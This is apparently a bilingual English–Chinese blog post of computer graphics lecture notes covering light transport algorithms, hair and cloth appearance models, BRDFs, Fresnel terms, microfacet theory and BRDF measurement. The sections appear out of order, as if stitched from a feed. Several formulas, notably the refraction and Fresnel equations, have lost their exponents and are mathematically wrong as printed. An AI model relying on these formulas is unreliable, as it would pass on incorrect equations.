    ​ 总的来说,无偏光线传输方法追求最高的图像质量和真实性,但计算成本较高;而有偏光线传输方法则更注重在合理的计算复杂度下获得可接受的图像质量,适用于实时或大规模渲染场景。在实际应用中,通常会根据具体需求和性能要求选择适当的光线传输方法。

    • Unbiased light transport methods

      无偏光传输方法

      • Bidirectional path tracing (BDPT)

        双向路径追踪 (BDPT)

      • Metropolis light transport (MLT)

        Metropolis 光传输 (MLT)

    • Biased light transport methods

有偏光传输方法

      • Photon mapping

        光子映射

      • Vertex connection and merging (VCM)

        顶点连接和合并 (VCM)

      • Instant radiosity (VPL / many light methods)

即时辐射度 (VPL / 多光源方法)


    Biased vs. Unbiased Monte Carlo Estimators

    • An unbiased Monte Carlo technique does not have any systematic error

      无偏蒙特卡罗技术没有任何系统误差

      • The expected value of an unbiased estimator will always be the correct value, no matter how many samples are used

        无论使用多少样本,无偏估计量的预期值始终是正确的值

    • Otherwise, biased

      否则,有偏差

      • One special case, the expected value converges to the correct value as infinite #samples are used — consistent

一种特殊情况:当样本数趋于无穷时,期望值会收敛到正确值,即“一致”(consistent)

• We’ll look again at this page after introducing Photon Mapping

      在介绍光子映射后,我们将再次查看此页面


    Bidirectional Path Tracing (BDPT)

    • Recall: a path connects the camera and the light

      回想一下:一条路径连接着相机和灯光

    • BDPT

      • Traces sub-paths from both the camera and the light

        追踪来自相机和灯光的子路径

      • Connects the end points from both sub-paths

        连接两个子路径的端点

    png

    ​BDPT 的基本思想是同时追踪从光源到摄像机的路径和从摄像机到场景中物体的路径,然后在这些路径上进行连接,以计算从光源到摄像机的光照传输。这种双向追踪方式为模拟复杂光照效果提供了更多的可能性。

    1. 从摄像机追踪路径
      • 从摄像机发射光线,追踪它们在场景中的路径。这种方法类似于传统路径追踪。
    2. 从光源追踪路径
      • 同时,从光源开始发射光线,追踪它们在场景中的传播。这种方法类似于光子映射等技术。
    3. 路径连接
      • 关键步骤是在摄像机路径和光源路径之间进行连接,形成一系列完整的路径。这些连接点的交汇位置和路径长短可以用来计算光照传输。

    png

    ​这是一个光路复杂的场景,主要光照都来自灯打到天花板后反射出来的光。

• Suitable if the light transport is complex on the light’s side

      适用于光传输在光端复杂的情况下

    • Difficult to implement & quite slow

      难以实现且速度较慢


    Metropolis Light Transport (MLT)

    png

    ​MLT 基于马尔可夫链蒙特卡洛算法 (Markov Chain Monte Carlo, MCMC)。它通过在渲染过程中构建一系列状态(或称为路径)并使用概率转移来搜索光线路径空间,以寻找高质量的渲染解决方案。

    1. 状态空间构建
      • MLT 从初始状态(或路径)开始,通过一系列随机变化逐步构建状态空间。这些状态描述了光线在场景中的传播路径,包括从光源到摄像机的直接和间接光照。
    2. 概率转移
      • MLT 使用概率转移算法来在状态空间中搜索,以决定接受或拒绝新状态。这个过程涉及到一系列基于状态之间差异的概率计算,以及利用接受率来平衡探索和收敛性能。
    3. 样本累积
      • MLT 通过对多个状态进行采样并根据它们的贡献权重来累积样本,以生成最终的渲染图像。这样的采样过程能够有效地降低图像中的噪声,并提高渲染的质量。
    • A Markov Chain Monte Carlo (MCMC) application

      马尔可夫链蒙特卡罗 (MCMC) 应用

      • Jumping from the current sample to the next with some PDF

按某个概率密度函数(PDF)从当前样本跳转到下一个样本

    • Very good at locally exploring difficult light paths

      非常擅长局部探索困难的光路

    • Key idea

      关键思想

      • Locally perturb an existing path to get a new path

        局部扰动现有路径以获得新路径


    png

    优点:

    • Works great with difficult light paths

      适用于困难的光路

    • Also unbiased

      也无偏差


    png

    缺点:

    • Difficult to estimate the convergence rate

      难以估计收敛速度

    • Does not guarantee equal convergence rate per pixel

      不能保证每个像素的收敛速度相等

    • So, usually produces “dirty” results

      因此,通常会产生“脏”结果

    • Therefore, usually not used to render animations

      因此,通常不用于渲染动画


    Photon Mapping

    ​光子映射

    png

    • A biased approach & A two-stage method

有偏(biased)的两阶段方法

    • Very good at handling Specular-Diffuse-Specular (SDS) paths and generating caustics

      非常擅长处理镜面反射-漫反射-镜面反射 (SDS) 路径和生成焦散


    Photon Mapping — Approach (variations apply)

    ​光子映射——方法(适用变化)

    ​Photon Mapping 主要分为两个阶段:光子发射和光子映射。

    1. 光子发射
      • 在这个阶段,光子从光源发射,并在场景中传播。这些光子以一定的概率与场景中的表面相交,并根据相交点的性质,如表面颜色、材质等,进行反射、折射或吸收。
    2. 光子映射
      • 在这个阶段,光子被映射到场景的光线路径上,并存储在特定的数据结构中,如光子图(photon map)。这个数据结构可以是基于光子碰撞点的空间分布,也可以是基于光子的能量和颜色等属性。
    3. 渲染
      • 在渲染阶段,相机射线从观察点出发,与场景中的表面相交。当相机射线与场景中的表面相交时,就可以使用光子图来估计光线的颜色和强度,从而计算出最终的图像颜色。

    png

    • Stage 1 — photon tracing

      第 1 阶段 — 光子追踪

      • Emitting photons from the light source, bouncing them around, then recording photons on diffuse surfaces

        从光源发射光子,使其四处反射,然后在漫反射表面上记录光子

    • Stage 2 — photon collection (final gathering)

      第 2 阶段 — 光子收集(最终聚集)

      • Shoot sub-paths from the camera, bouncing them around, until they hit diffuse surfaces

        从相机中发射子路径,让它们四处弹跳,直到它们击中漫反射表面


    Photon Mapping

    png

    • Calculation — local density estimation

      计算 — 局部密度估计

      • Idea: areas with more photons should be brighter

        想法:光子较多的区域应该更亮

      • For each shading point, find the nearest N photons. Take the surface area they cover

        对于每个着色点,找到最近的 N 个光子,取它们所覆盖的表面积
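​对应的辐射亮度估计可以写成(标准的光子映射密度估计形式;$\Delta\Phi_p$ 为第 $p$ 个光子携带的通量,$r$ 为恰好包住最近 $N$ 个光子的圆盘半径):

$$L_r(x,\omega_o)\approx\sum_{p=1}^{N}f_r(x,\omega_p,\omega_o)\,\frac{\Delta\Phi_p}{\Delta A},\qquad \Delta A=\pi r^2$$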


    png

    • Why biased?

      为什么有偏差?

    • Local Density estimation $\text dN / \text dA \ne \Delta N / \Delta A$

      局部密度估计 $\text dN / \text dA \ne \Delta N / \Delta A$

    • But in the sense of limit

      但在极限意义上

      • More photons emitted ->

        发射更多光子 ->

      • the same $N$ photons covers a smaller $\Delta A$ ->

        相同的 $N$ 个光子覆盖较小的 $\Delta A$ ->

      • $\Delta A$ is closer to $\text dA$

        $\Delta A$ 更接近 $\text dA$

    • So, biased but consistent!

      因此,有偏差但一致!

• An easier way to understand bias in rendering

      更容易理解渲染中的偏差

      • Biased == blurry

        偏差 == 模糊

      • Consistent == not blurry with infinite #samples

一致 == 样本数趋于无穷时不再模糊

    • Why not do a “const range” search for density estimation?

      为什么不用“固定范围”搜索来做密度估计?(因为固定的 ΔA 不会随发射光子数的增加而缩小,估计结果有偏且不一致。)


    Vertex Connection and Merging

    ​顶点连接与合并

    png

    • A combination of BDPT and Photon Mapping

      BDPT 和光子映射的结合

    • Key idea

      关键思想

• Let’s not waste the sub-paths in BDPT if their end points cannot be connected but can be merged

        如果 BDPT 中的子路径的端点无法连接但可以合并,那么就不要浪费它们

      • Use photon mapping to handle the merging of nearby “photons”

        使用光子映射来处理附近“光子”的合并


    Instant Radiosity (IR)

    ​即时辐射 (IR)

    png

    • Sometimes also called many-light approaches

有时也称为多光源(many-light)方法

    • Key idea

      核心思想

      • Lit surfaces can be treated as light sources

        光照表面可视为光源

    • Approach

      方法

      • Shoot light sub-paths and assume the end point of each sub-path is a Virtual Point Light (VPL)

发射光线子路径,并将每条子路径的终点视为一个虚拟点光源 (VPL)

      • Render the scene as usual using these VPLs

        使用这些 VPL 照常渲染场景

    png

    ​右图中,由于除以了一个极小的浮点数,导致边缘极亮。

    • Pros: fast and usually gives good results on diffuse scenes

      优点:速度快,通常在漫反射场景中效果良好

    • Cons:

      缺点

      • Spikes will emerge when VPLs are close to shading points

        当 VPL 靠近着色点时会出现尖峰

      • Cannot handle glossy materials

        无法处理光泽材质

    Advanced Appearance Modeling

    ​非表面模型是描述物体内部结构或几何形状的模型,不仅包括物体的外部表面,还包括内部的结构或体积。

    • Non-surface models

      非表面模型

      • Participating media

        参与介质

      • Hair / fur / fiber (BCSDF)

        头发/毛皮/纤维 (BCSDF)

      • Granular material

        颗粒材料

    ​表面模型是描述物体外部表面的模型,通常由一系列的表面片段或曲面组成。

    • Surface models

      表面模型

      • Translucent material (BSSRDF)

        半透明材料 (BSSRDF)

      • Cloth

        布料

      • Detailed material (non-statistical BRDF)

        详细材料 (非统计 BRDF)

    • Procedural appearance

      程序外观

    Non-Surface Models

    ​非表面模型


    Participating Media

​参与介质

    png

    ​非表面模型范例:Fog 和 Cloud。

    png

    • At any point as light travels through a participating medium, it can be (partially) absorbed and scattered.

      光在穿过参与介质的任何时刻都会被(部分)吸收和散射。

    png

    • Use Phase Function to describe the angular distribution of light scattering at any point $x$ within participating media.

      使用相位函数描述参与介质中任意点 $x$ 的光散射的角度分布。
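​一个常用的解析相位函数是 Henyey-Greenstein(示意实现;g ∈ (−1,1) 控制前向/后向散射的偏好,g=0 时退化为各向同性散射):

#include <cmath>

// cosTheta 为入射与出射方向夹角的余弦
float henyeyGreenstein(float cosTheta, float g)
{
    const float pi = 3.14159265358979f;
    float g2    = g * g;
    float denom = 1.0f + g2 - 2.0f * g * cosTheta;
    // p(theta) = (1/4pi) * (1-g^2) / (1+g^2-2g cos theta)^(3/2)
    return (1.0f - g2) / (4.0f * pi * denom * std::sqrt(denom));
}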


    Participating Media: Rendering

    png

    • Randomly choose a direction to bounce

      随机选择一个方向进行反弹

    • Randomly choose a distance to go straight

      随机选择一个距离进行直线运动

    • At each ‘shading point’, connect to the light

在每个“着色点”处,连接到光源


    Participating Media: Application

    png


    Hair Appearance

    ​毛发材质

    png


    Kajiya-Kay Model

​Kajiya-Kay 模型是一种经典的毛发着色模型,由 Jim Kajiya 和 Tim Kay 在 1989 年提出,是计算机图形学中最早被广泛使用的头发高光模型之一。

Kajiya-Kay 模型的基本原理:

​模型将发丝视为细圆柱体。圆柱表面没有唯一的法线,因此光照改用发丝的切线方向来计算:漫反射项取决于光线方向与切线的夹角,高光项取决于半程向量与切线的夹角,从而得到沿发丝方向拉长的各向异性高光。

Kajiya-Kay 模型的主要特点:

1. 经验模型:不基于毛发的物理结构,而是对细圆柱反射的直观近似,计算开销小。
2. 局部光照模型:只考虑光源对单根发丝的直接光照,不考虑发丝间的多次散射等全局效应。
3. 各向异性高光:高光沿发丝方向拉长,能表现头发特有的丝状光泽。

    png

    png

    ​使用 Kajiya-Kay Model 渲染头发的效果图。
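​Kajiya-Kay 高光项的示意实现(仅高光部分;函数与参数名为本文假设):用发丝切线 T 代替法线,sin(T,H) = sqrt(1 − (T·H)²),再做幂次。

#include <algorithm>
#include <cmath>

// tDotH 为发丝切线 T 与半程向量 H 的点积,shininess 为高光指数
float kajiyaKaySpecular(float tDotH, float shininess)
{
    float sinTH = std::sqrt(std::max(0.0f, 1.0f - tDotH * tDotH));
    return std::pow(sinTH, shininess);
}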


    Marschner Model

    ​Marschner 模型是一种用于模拟人类头发或其他细长纤维的光照行为的计算机图形学模型。它由 Steve Marschner 等人在 2003 年提出,是一种基于物理的模型,旨在更准确地描述头发等细长纤维的外观。

    Marschner 模型的基本原理:

    ​Marschner 模型基于头发纤维的微观结构和光的物理性质,考虑了头发内部的散射、吸收和折射等光学效应,以及表面的漫反射、镜面反射和透射等效应。

    Marschner 模型的主要特点:

1. 基于物理的纤维模型:将发丝建模为含色素吸收的介电圆柱体(角质层、皮质等结构决定其光学参数),散射函数由物理推导并与测量数据对照。
2. 多种光路:显式区分 R(表面反射)、TT(两次透射)和 TRT(内部反射后再透射)三类光路,每类光路各自贡献一个高光。
3. 彩色高光:TT/TRT 路径穿过含色素的皮质时被吸收,产生带头发本身颜色的次级高光;主高光(R)则接近光源颜色。
4. 高光偏移:由于角质层鳞片使表面相对发丝轴略有倾斜,各高光沿发丝方向相互错开,更接近真实头发的外观。

    png

    png

    • Glass-like cylinder

      玻璃状圆柱体

    png

    • 3 types of light interactions: R, TT, TRT

      3 种光相互作用:R、TT、TRT

      (R: reflection, T: transmission)

      (R:反射,T:透射)

    png


    Hair Appearance Model: Application

    png


    Fur Appearance — As Human Hair

    ​毛皮外观——作为人类头发

    • Cannot represent diffusive and saturated appearance

      无法呈现弥散和饱和的外观(用人类头发模型来描述动物毛发效果并不真实)

    png


    Human Hair vs Animal Fur

    png

    ​人类毛发结构与动物毛发结构不太一样。

    • Common for hair/fur fibers

      常见于毛发/毛皮纤维

      • Cuticle

        角质层

        • Covered with scales

          覆盖有鳞片

      • Medulla

        髓质

        • Complex structure

          结构复杂

        • Scatters light

          散射光线

      • Cortex

        皮质

        • Contains pigments

          含有色素

        • Absorbs light

          吸收光线


    Importance of Medulla

    ​髓质层的重要性(让毛发更具光泽)

    png

    png


    Double Cylinder Model

    ​双重圆柱体模型

    png


    Double Cylinder Model — Lobes

    png

    png

    png

    ​这张图渲染一帧要 36.9min。

    png


    Granular Material

    ​颗粒材质

    • What is granular material?

    png

    png

    Can we avoid explicit modeling of all granules?

    ​我们能否避免对所有粒子进行显式建模?

    • Yes with procedural definition.

      是的,通过程序定义。

    png

    Surface Models

    png

    ​接下来处理这种 Translucent Material 半透明的材质。


    Subsurface Scattering

    ​次表面散射

    png

    • Visual characteristics of many surfaces caused by light exiting at different points than it enters

      由于光线从不同点射出和射入,导致许多表面的视觉特征

      • Violates a fundamental assumption of the BRDF

        违反了 BRDF 的基本假设

    png


    Scattering Functions

    ​散射函数

    • BSSRDF: generalization of BRDF; exitant radiance at one point due to incident differential irradiance at another point:

      BSSRDF:BRDF 的推广;某一点的出射辐射度是由于另一点的入射差分辐照度引起的:

    $$S(x_i,\omega_i,x_o,\omega_o)$$

    • Generalization of rendering equation: integrating over all points on the surface and all directions (!)

      渲染方程的推广:对表面上所有点和所有方向进行积分(!)

    $$L(x_o,\omega_o)=\int_A\int_{H^2}S(x_i,\omega_i,x_o,\omega_o)L_i(x_i,\omega_i)\cos\theta_i\mathrm d\omega_i\mathrm dA$$

    png


    Dipole Approximation [Jensen et al. 2001]

    • Approximate light diffusion by introducing two point sources.

      通过引入两个点源来近似光扩散。

    png

    ​BRDF 与 BSSRDF 效果对比:

    png

    png

    png

    png


    Cloth

    png

    A collection of twisted fibers!

    ​扭曲纤维的集合!

    Two levels of twist

    ​两层扭曲

    • Woven or knitted

      机织或针织

    png


    Cloth: Render as Surface

    png

    • Given the weaving pattern, calculate the overall behavior

      给定编织模式,计算整体行为

    • Render using a BRDF

      使用 BRDF 进行渲染

    png

    Render as Surface — Limitation

    png

    ​这个模型对尼龙好使,对天鹅绒不好使。


    Cloth: Render as Participating Media

    ​将布料作为参与媒介

    png

    • Properties of individual fibers & their distribution -> scattering parameters

      单个纤维的属性及其分布 -> 散射参数

    • Render as a participating medium

      作为参与介质进行渲染


    Cloth: Render as Actual Fibers

    png

    • Render every fiber explicitly!

显式地逐根渲染每一根纤维!计算量爆炸!


    Cloth: Demo & Application

    png


    Detailed Appearance: Motivation

    ​详细外观:动机

    png

    • Not looking realistic, why?

      看上去并不真实,为什么?表面太完美了,没有划痕,反而不够真实。


    Real world is more complicated

    ​现实世界更加复杂

    png

    png


    Recap: Microfacet BRDF

    ​回顾:微面片 BRDF

    png

    Surface = Specular microfacets + Statistical normals

    表面 = 镜面微表面 + 统计法线

    $$f(\mathbf{i},\mathbf{o})=\frac{\mathbf{F}(\mathbf{i},\mathbf{h})\mathbf{G}(\mathbf{i},\mathbf{o},\mathbf{h})\mathbf{D}(\mathbf{h})}{4(\mathbf{n},\mathbf{i})(\mathbf{n},\mathbf{o})}$$

    • $\mathbf{D}(\mathbf{h})$:

      NDF: Normal Distribution Function

      法线分布函数


    Statistical NDF vs. Actual NDF

    png

    ​将法线变得有锯齿。


    Define details

    png

    ​法线坑坑洼洼的。渲染?太难了!


    Difficult path sampling problem

    ​困难路径采样问题

    png

    ​好多射线都 miss 了,浪费了运算资源。


    Solution: BRDF over a pixel

    ​解决方案:像素上的 BRDF

    png

    Detailed / Glinty Material

    ​细致/闪亮材质

    png


    Recent Trend: Wave Optics

    ​近期趋势:波动光学

​光具有波粒二象性;当表面细节小到与光的波长相当时,光就不能再按直线传播(几何光学)来处理,会发生衍射,产生其它颜色的小光斑。

    png

    png

    Procedural Appearance

    png

    • Can we define details without textures?

      我们可以在不使用纹理的情况下定义细节吗?

      • Yes! Compute a noise function on the fly.

        是的!动态计算噪声函数。(纹理是用函数计算出来的)

      • 3D noise ->internal structure if cut or broken

        3D 噪音 -> 内部结构如有切割或破损(依然可以显示出纹理)

      • Thresholding (noise -> binary noise)

        阈值(噪声 -> 二元噪声)
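​一个最小草图(哈希函数与常数均为示意,不对应某个具体引擎):整数格点上的哈希噪声加阈值化,细节完全由函数即时算出,物体切开后内部同样有结构。

#include <cmath>
#include <cstdint>

// 对每个 3D 整数格点返回 [0,1] 内的伪随机值(示意用的整数哈希)
float hashNoise3D(int x, int y, int z)
{
    std::uint32_t h = std::uint32_t(x) * 374761393u
                    + std::uint32_t(y) * 668265263u
                    + std::uint32_t(z) * 2246822519u;
    h = (h ^ (h >> 13)) * 1274126177u;
    return float(h & 0xFFFFFFu) / float(0xFFFFFFu);
}

// 阈值化:连续噪声 -> 二元噪声,可表示孔洞、斑点等“有/无”式细节
bool binaryNoise3D(float x, float y, float z, float threshold)
{
    int xi = int(std::floor(x));
    int yi = int(std::floor(y));
    int zi = int(std::floor(z));
    return hashNoise3D(xi, yi, zi) > threshold;
}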

    ]]>
    + 资源

    课程

    Lecture 17 Materials and Appearances

    The Appearance of Natural Materials

    ​天然材质的外观

    png

    ​大千世界,材质万千。


    What is Material in Computer Graphics?

    ​计算机图形学中的材质是什么?

    png

    Material == BRDF

    ​BRDF 是双向反射分布函数(Bidirectional Reflectance Distribution Function)的缩写。它是描述表面材质如何反射入射光的函数。BRDF 定义了给定入射方向和出射方向下,单位入射光能量在各个出射方向上的分布。简单来说,BRDF 描述了光线与表面相互作用时光的反射特性。

    What is this material?

    png

    Diffuse / Lambertian Material (BRDF)

    ​漫反射/朗伯材质 (BRDF)

    png


    Light is equally reflected in each output direction

    ​光线在每个输出方向上均等反射

    png

    Suppose the incident lighting is uniform:

    ​假设入射光是均匀的:

    $$\begin{aligned}
    L_o(\omega_o)& =\int_{H^2}f_rL_i(\omega_i)\cos\theta_i\mathrm{d}\omega_i \
    &=f_rL_i\int_{H^2}(\omega_i)\cos\theta_i\mathrm{d}\omega_i \
    &=\pi f_rL_i
    \end{aligned}$$

    $f_r=\frac{\rho}{\pi}$——albedo 反照率 (color)


    What is this material?

    png


    Glossy material (BRDF)

    ​光泽材质(BRDF)

    png


    What is this material?

    png


    Ideal reflective / refractive material (BSDF)*

    ​理想的反射/折射材料 (BSDF*)

    png


    Perfect Specular Reflection

    ​完美的镜面反射(只有反射没有折射)

    png

    png

    Top-down view (looking down on surface)
    自上而下的视图(俯视表面)

    png

    $$\omega_o+\omega_i=2\cos\theta\mathrm{~\vec{n}}=2(\omega_i\cdot\vec{\mathrm{n}})\vec{\mathrm{n}}$$

    $$\omega_o=-\omega_i+2(\omega_i\cdot\vec{\mathrm{n}})\vec{\mathrm{n}}$$


    Perfect Specular Reflection BRDF

    ​完美镜面反射 BRDF

    png


    Specular Refraction

    ​镜面折射

    In addition to reflecting off surface, light may be transmitted through surface.

    ​除了从表面反射外,光还可以穿过表面。

    Light refracts when it enters a new medium.

    ​光进入新介质时会发生折射。

    png


    Snell’ s Law

    ​斯涅尔定律

    Transmitted angle depends on

    ​透射角取决于

    index of refraction (IOR) for incident ray

    ​入射光线的折射率 (IOR)

    index of refraction (IOR) for exiting ray

    ​出射光线的折射率 (IOR)

    png

    $$\eta_i\sin\theta_i=\eta_t\sin\theta_t$$


    Law of Refraction

    ​折射定律

    png

    $$\begin{aligned}
    \eta_{i}\sin\theta_{i}& =\eta_t\sin\theta_t \
    \cos\theta_{t}& =\sqrt{1-\sin^2\theta_t} \
    &=\sqrt{1-\left(\frac{\eta_i}{\eta_t}\right)2\sin2\theta_i} \
    &=\sqrt{1-\left(\frac{\eta_i}{\eta_t}\right)2(1-\cos2\theta_i)}
    \end{aligned}$$

    Total internal reflection:

    ​全内反射

    When light is moving from a more optically dense medium to a less optically dense medium:

    ​当光从光密度较大的介质移动到光密度较小的介质时:

    $$1-\left(\frac{\eta_i}{\eta_t}\right)2(1-\cos2\theta_i)<0$$

    求得

    $$\frac{\eta_i}{\eta_t}>1$$

    Light incident on boundary from large enough angle will not exit medium.

    ​从足够大的角度入射到边界的光将不会离开介质。


    Snell’ 's Window / Circle

    png


    Fresnel Reflection / Term

    ​菲涅尔项

    Reflectance depends on incident angle (and polarization of light)

    ​反射率取决于入射角(和光的偏振)

    png

    This example: reflectance increases with grazing angle

    ​本例:反射率随观察角增加(变亮了)

    ​Fresnel Term(菲涅尔项)描述了光线与介质界面之间的反射和透射的比例。菲涅尔项是一个关于入射角度和折射率之间关系的函数,通常用来计算光线在介质表面的反射和透射的强度。

    ​在计算菲涅尔项时,通常使用菲涅尔方程来描述入射光线在介质表面的反射和透射情况。菲涅尔方程包括两个方面:垂直极化和平行极化。垂直极化表示光的电场矢量垂直于入射平面,而平行极化表示电场矢量在入射平面内。

    ​菲涅尔项的计算取决于入射角度、折射率以及光线的极化状态。在计算机图形学和光学模拟中,菲涅尔项通常被用于模拟材质的反射特性,以便更准确地模拟真实世界中的光线行为。


    Fresnel Term (Dielectric, $\eta=1.5$)

    ​菲涅尔项(介电体,$\eta=1.5$)

    png

    • S 极化(也称为垂直极化):在S极化状态下,入射光的电场矢量与入射平面垂直。当光线以 S 极化状态入射到介质表面时,其部分能量会被反射,而部分会被折射。S 极化通常与垂直于入射平面的反射和透射相关联。

    • P 极化(也称为平行极化):在P极化状态下,入射光的电场矢量位于入射平面内。与 S 极化类似,当光线以 P 极化状态入射到介质表面时,也会发生一部分反射和一部分折射。P极化通常与入射平面内的反射和透射相关联。

    • “unpolarized”(非偏振)光是指入射光中电场矢量的方向没有特定的取向,而是随机分布的。这意味着它包含了各种极化状态的光,无法用 S 极化或 P 极化来描述。非偏振光通常是自然光或由光源发出的常见光线,其电场矢量在所有可能的方向上均匀分布。在介质表面反射时,非偏振光的极化状态可能会因反射而发生改变,产生 S 极化和 P 极化的组合。

    ​与表面法线夹角越大,反射率越高。


    Fresnel Term (Conductor)

    ​菲涅尔项(导体)

    png


    Fresnel Term — Formulae

    ​菲涅尔项 — 公式

    Accurate: need to consider polarization

    ​准确:需要考虑极化

    $$R_s=\left|\frac{n_1\cos\theta_\mathrm{i}-n_2\cos\theta_\mathrm{t}}{n_1\cos\theta_\mathrm{i}+n_2\cos\theta_\mathrm{t}}\right|2=\left|\frac{n_1\cos\theta_\mathrm{i}-n_2\sqrt{1-\left(\frac{n_1}{n_2}\sin\theta_\mathrm{i}\right)2}}{n_1\cos\theta_\mathrm{i}+n_2\sqrt{1-\left(\frac{n_1}{n_2}\sin\theta_\mathrm{i}\right)^2}}\right|$$

    $$R_\mathrm{p}=\left|\frac{n_1\cos\theta_\mathrm{t}-n_2\cos\theta_\mathrm{i}}{n_1\cos\theta_\mathrm{t}+n_2\cos\theta_\mathrm{i}}\right|2=\left|\frac{n_1\sqrt{1-\left(\frac{n_1}{n_2}\sin\theta_\mathrm{i}\right)2}-n_2\cos\theta_\mathrm{i}}{n_1\sqrt{1-\left(\frac{n_1}{n_2}\sin\theta_\mathrm{i}\right)2}+n_2\cos\theta_\mathrm{i}}\right|2$$

    $$R_\mathrm{eff}=\frac12\left(R_\mathrm{s}+R_\mathrm{p}\right)$$

    Approximate: Schlick’ s approximation

    ​近似:Schlick 近似

    $$\begin{aligned}
    R(\theta)& =R_0+(1-R_0)(1-\cos\theta)^5 \
    R_{0}& =\left(\frac{n_1-n_2}{n_1+n_2}\right)^2
    \end{aligned}$$

    Microfacet Material

    ​微面片材质

    png

    ​从太空中看地球,看不出山脉的粗糙,反而是一片光滑的感觉。


    Microfacet Theory

    ​微面理论

    png

    Rough surface

    ​粗糙表面

    • Macroscale: flat & rough

      宏观尺度:平坦且粗糙

    • Microscale: bumpy & specular

      微观尺度:凹凸不平且镜面反射

    Individual elements of surface act like mirrors

    表面的各个元素就像镜子一样

    • Known as Microfacets

      称为微面

    • Each microfacet has its own normal

      每个微面都有自己的法线


    Key: the distribution of microfacets’ normals

    ​关键:微面元法线的分布

    png

    • Concentrated <==> glossy

      集中 <==> 光泽

    png

    • Spread <==> diffuse

      分散 <==> 漫射


    Microfacet BRDF

    • What kind of microfacets reflect $w_i$ to $w_o$? (hint: microfacets are mirrors)

      什么样的微表面能将 $w_i$ 反射到 $w_o$?(提示:微表面是镜子)

    png

    $f(\mathbf{i},\mathbf{o})=\frac{\mathbf{F}(\mathbf{i},\mathbf{h})\mathbf{G}(\mathbf{i},\mathbf{o},\mathbf{h})\mathbf{D}(\mathbf{h})}{4(\mathbf{n,i})(\mathbf{n,o})}$

    • $\mathbf{F}(\mathbf{i},\mathbf{h})$​:Fresnel term 菲涅尔项
    • $\mathbf{G(i,o,h)}$:shadowing-masking term 遮蔽掩蔽项(微表面反射时被另一个微表面所阻挡)
    • $\mathbf{D(h)}$​:distribution of normals(法线的分布)

    png


    Isotropic / Anisotropic Materials (BRDFs)

    ​各向同性/各向异性材料 (BRDF)

    png

    ​对不同方向光反射率不一样,称为各向异性材料(一般现实生活中,这种材料都是人造的)

    • Key: directionality of underlying surface

      关键词:底层表面的方向性

    png


    Anisotropic BRDFs

    ​各向异性 BRDF

    Reflection depends on azimuthal angle $\Phi$

    ​反射取决于方位角 $\Phi$

    $$f_r(\theta_i,\phi_i;\theta_r,\phi_r)\neq f_r(\theta_i,\theta_r,\phi_r-\phi_i)$$

    Results from oriented microstructure of surface, e.g., brushed metal

    ​来自表面定向微结构的结果,例如拉丝金属

    png

    png

    png

    png

    ​这玩意摸一摸还能改变它的纹路。


    Properties of BRDFs

    ​BRDF 的性质

    • Non-negativity

      非负性

    $$f_r(\omega_i\to\omega_r)\ge 0$$

    • Linearity

      线性叠加

    $$L_r(\mathrm{p},\omega_r)=\int_{H^2}f_r(\mathrm{p},\omega_i\to\omega_r)L_i(\mathrm{p},\omega_i)\cos\theta_i\mathrm{d}\omega_i$$

    png

    • Reciprocity principle

      可逆性

    $$f_r(\omega_r\to\omega_i)=f_r(\omega_i\to\omega_r)$$

    png

    • Energy conservation

      能量守恒

    $$\forall\omega_r\int_{H^2}f_r(\omega_i\to\omega_r)\cos\theta_i\mathrm{d}\omega_i\leq1$$

    ​一部分能量被吸收,$\le 1$

    • Isotropic vs. anisotropic
      • If isotropic, $f_r(\theta_i,\phi_i;\theta_r,\phi_r)=f_r(\theta_i,\theta_r,\phi_r-\phi_i)$
      • Then, from reciprocity, $f_r(\theta_i,\theta_r,\phi_r-\phi_i)=f_r(\theta_r,\theta_i,\phi_i-\phi_r)=f_r(\theta_i,\theta_r,|\phi_r-\phi_i|)$

    png

    Measuring BRDFs

    Measuring BRDFs: Motivation

    ​测量 BRDF:动机

    Avoid need to develop / derive models

    • Automatically includes all of the scattering effects present

    Can accurately render with real-world materials

    • Useful for product design, special effects, …

    Theory vs. practice:

    png


    Image-Based BRDF Measurement

    ​基于图像的 BRDF 测量

    png

    ​光线照着物体,相机绕物体一周。


    Measuring BRDFs: gonioreflectometer

    ​测量 BRDF:测角反射计

    png


    Measuring BRDFs

    General approach:

    ​一般的做法:

    ```
    foreach outgoing direction wo                                   对于每个出射方向 wo
        move light to illuminate surface with a thin beam from wo   移动光源,使来自 wo 方向的细光束照亮表面
        for each incoming direction wi                              对于每个入射方向 wi
            move sensor to be at direction wi from surface          移动传感器,使其位于表面的 wi 方向上
            measure incident radiance                               测量入射辐射度
    ```

    Improving efficiency:

    ​提高效率:

    • Isotropic surfaces reduce dimensionality from 4D to 3D

      各向同性表面将维度从 4D 降低到 3D

    • Reciprocity reduces # of measurements by half

      互易性将测量次数减少一半

    • Clever optical systems…

      智能光学系统……


    Challenges in Measuring BRDFs

    • Accurate measurements at grazing angles

      以掠射角进行精确测量

    • Important due to Fresnel effects

      由于菲涅尔效应而显得重要

    • Measuring with dense enough sampling to capture high frequency specularities

      使用足够密集的采样进行测量以捕捉高频镜面反射

    • Retro-reflection

      回射

    • Spatially-varying reflectance, …

      空间变化的反射率,…


    Representing Measured BRDFs

    ​表示测量的 BRDF

    Desirable qualities

    ​理想品质

    • Compact representation

      紧凑表示

    • Accurate representation of measured data

      测量数据的准确表示

    • Efficient evaluation for arbitrary pairs of directions

      对任意方向对的有效评估

    • Good distributions available for importance sampling

      可用于重要性抽样的良好分布


    Tabular Representation

    ​表格表示

    Store regularly-spaced samples in $(\theta_i,\theta_o,|\phi_i-\phi_o|)$

    ​将间隔均匀的样本按 $(\theta_i,\theta_o,|\phi_i-\phi_o|)$ 存储在表中

    • Better: reparameterize angles to better match specularities

      更好:重新参数化角度以更好地匹配镜面反射

    Generally need to resample measured values to table

    ​通常需要将测量值重新采样到表中

    Very high storage requirements

    ​存储要求非常高

    png

    Lecture 18 Advanced Topics in Rendering

    Advanced Light Transport

    1. Unbiased light transport methods(无偏光线传输方法)
      • 这些方法旨在以最准确的方式模拟真实世界中光的行为,而不引入系统性的偏差。
      • 无偏方法通常通过追踪光线的路径并对其进行积分来实现。典型的无偏方法包括路径追踪(Path Tracing)、双向路径追踪(Bidirectional Path Tracing)和 Metropolis 光传输(Metropolis Light Transport)等。
      • 优点:可以获得高质量、逼真的图像,特别是对于复杂的光照和材质场景。
      • 缺点:由于需要追踪大量的光线路径并进行复杂的积分计算,无偏方法通常具有较高的计算成本。
    2. Biased light transport methods(有偏光线传输方法)
      • 这些方法通过引入一定的偏差或近似,以减少计算成本并加快渲染速度。
      • 有偏方法的设计目标是在保持图像质量的同时降低计算复杂度。
